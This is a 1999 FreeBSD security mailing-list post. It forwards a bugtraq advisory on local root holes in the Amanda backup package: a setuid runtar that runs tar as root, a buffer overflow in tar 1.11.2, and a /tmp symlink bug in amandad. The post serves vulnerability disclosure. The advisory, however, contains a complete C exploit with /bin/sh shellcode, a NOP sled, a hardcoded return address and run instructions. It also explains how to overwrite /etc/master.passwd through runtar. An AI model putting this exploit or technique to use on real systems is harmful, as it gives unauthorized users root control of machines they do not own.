Date: Tue, 2 Nov 1999 11:18:06 -0500 (EST) From: Robert Watson <robert@cyrus.watson.org> To: freebsd-security@FreeBSD.ORG Cc: "Tellier, Brock" <btellier@USA.NET>, gpalmer@FreeBSD.ORG, cwt@FreeBSD.ORG Subject: Buffer overflow in tar, amanda permissions/symlinks (was: bugtraq: , Amanda multiple vendor local root compromises (fwd)) Message-ID: <Pine.BSF.3.96.991102104405.27878F-100000@fledge.watson.org>
next in thread | raw e-mail | index | archive | help
In the bugtraq message below, Brock Tellier outlines an attack based on a number security issues in FreeBSD. The first has to do with our packaging of Amanda, which introduces weaker security constraints than the default Amanda installation from the developer. The second has to do with a buffer overflow vulnerability in tar (more serious, I think), and the third is a bug strictly in Amanda (that manifests itself on BSD also). The tar bug concerns me a lot--I'm not sure how well audited the tar code is, but a lot of people expect that they can untar a tar file from an untrusted third party and not give up all their privileges to that party. This bug has to do with the length of the filename--a four hundred letter long filename is sure to arouse some suspicion, if it is handled manually, but this might imply the existence of other buffer overflows in the file, and cause trouble for anyone who accepts tarballs in some automated manner and then untars them automatically. I don't know how the OpenBSD tar and our tar differ, but it might be worthwhile to compare them, as needless to say their code is extremely well audited for buffer-overflow sorts of bugs. The symlink bug is a problem for the Amanda maintainers, and it presumably a question of using mktemp(). I don't have contact information for them, but hopefully they read bugtraq or someone can forward this or the original message to them. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services ---------- Forwarded message ---------- Date: Sat, 30 Oct 1999 23:14:25 -0700 From: "Tellier, Brock" <btellier@USA.NET> To: BUGTRAQ@SECURITYFOCUS.COM Subject: Amanda multiple vendor local root compromises Greetings, OVERVIEW: The Amanda backup package has a several vulnerabilities which will allow any user to gain root privs. BACKGROUND: My tests were done ONLY on FreeBSD 3.3-RELEASE, though this is almost certainly not the only vulnerable OS. A search for "amanda-2 and not freebsd" on altavista yields preliminary, unconfirmed data that some of the vulnerable OS's (based on packages that are included on install CD's, anyone can install Amanda to make themselves vulnerable) may be: RedHat ?.?, TurboLinux, PowerTools CD, SuSE 6.2 Confirmation on which OS's/tar's are vulnerable would be useful. DETAILS: Amanda's "runtar" program, suid root by default on FreeBSD 3.3, calls /usr/bin/tar and passes all args given to runtar to this program. Tar is thus run with root permissions and is vulnerable to all of the same attacks on suid programs that it would have if it were suid itself. Vuln #1 - run tar as root Since tar is run with root permissions, you are free to tar up any file you wish, including /etc/master.passwd. You may also untar any file you wish, to any location on the system, including /etc/master.passwd. This does not require any exploit kung-fu and may be done by supplying args to tar/runtar as if you were root. Vuln #1.1 - tar contains a buffer overflow Obtaining root via buffer overflow here is redundant, of course, but it illustrates the point that even if tar's capabilities weren't able to gain root privs, the buffer overflow would still allow you to do so. An overflow exists *IN TAR* which will allow any user to execute commands as root. Note that an overflow in tar isn't an immediate security flaw since it is never suid/sgid, but it goes to show that one should do security audits of all the programs one calls with user input. By passing a long string to runtar in the form "/usr/local/libexec/amanda/runtar cvf $400bytes:bah" we can execute our commands. FreeBSD exploit attached below. Vuln #2 - symlink problem Not quite as serious, but a concern nonetheless. When the amandad daemon is run, a bin-owned file called "amandad.debug" in /tmp. By creating a symlink from /tmp/amandad.debug to any other file, we will force amandad to clobber the contents with that of amandad's debug info. Note that amandad is not suid/sgid, but it is often run with root perms at startup or via scripts. WHO IS VULNERABLE: Anyone running a suid version of runtar should be suspicious. I've not tested any other O.S.'s except FreeBSD 3.3, which includes amanda 2.3.0 and 2.4.1 as "additional packages" on the install CD and tar-1.11.2. EXPLOIT: /* * Amanda runtar exploit yields euid=0(root) * Actually overflows tar 1.11.2 (included in FreeBSD 3.3) * Tested on FreeBSD 3.3, modify shell/addr/dir for Amanda/tar on other * platforms * * Compile gcc -o amandax amandax.c * Run ./amandax <offset> <buflen> * keep buflen around 400, try positive and negative offsets * * Brock Tellier btellier@usa.net */ #include <stdlib.h> #include <stdio.h> char fbsdshell[]= /* mudge@lopht.com */ "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh"; #define LEN 400 #define NOP 0x90 #define ALIGN 3 #define OFFSET 0 #define ADDR 0xbfbfdd90 /* fbsd 3.3 */ int main(int argc, char *argv[]) { long int offset=OFFSET; int i; int buflen = LEN; long int addr = ADDR; char buf[LEN]; if (argc > 1) offset = atoi(argv[1]); if (argc > 2) buflen = atoi(argv[2]); if (argc > 3) { fprintf(stderr, "Usage: %s <offset> <buflen>"); exit(0); } fprintf(stderr, "Amanda runtar exploit for FreeBSD 3.3\n"); fprintf(stderr, "Brock Tellier btellier@usa.net\n"); fprintf(stderr, "Using addr: 0x%x\t buflen: %d\t offset: %d\n", addr+offset, buflen, offset); memset(buf,NOP,buflen); memcpy(buf+100,fbsdshell,strlen(fbsdshell)); for(i= 100 + strlen(fbsdshell)+ALIGN;i<buflen-4;i+=4)*(int *)&buf[i]=addr+offset; execl("/usr/local/libexec/amanda/runtar", "runtar","cvf", buf, ":bah", NULL); exit(0); } Brock Tellier UNIX Systems Administrator Chicago, IL, USA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.96.991102104405.27878F-100000>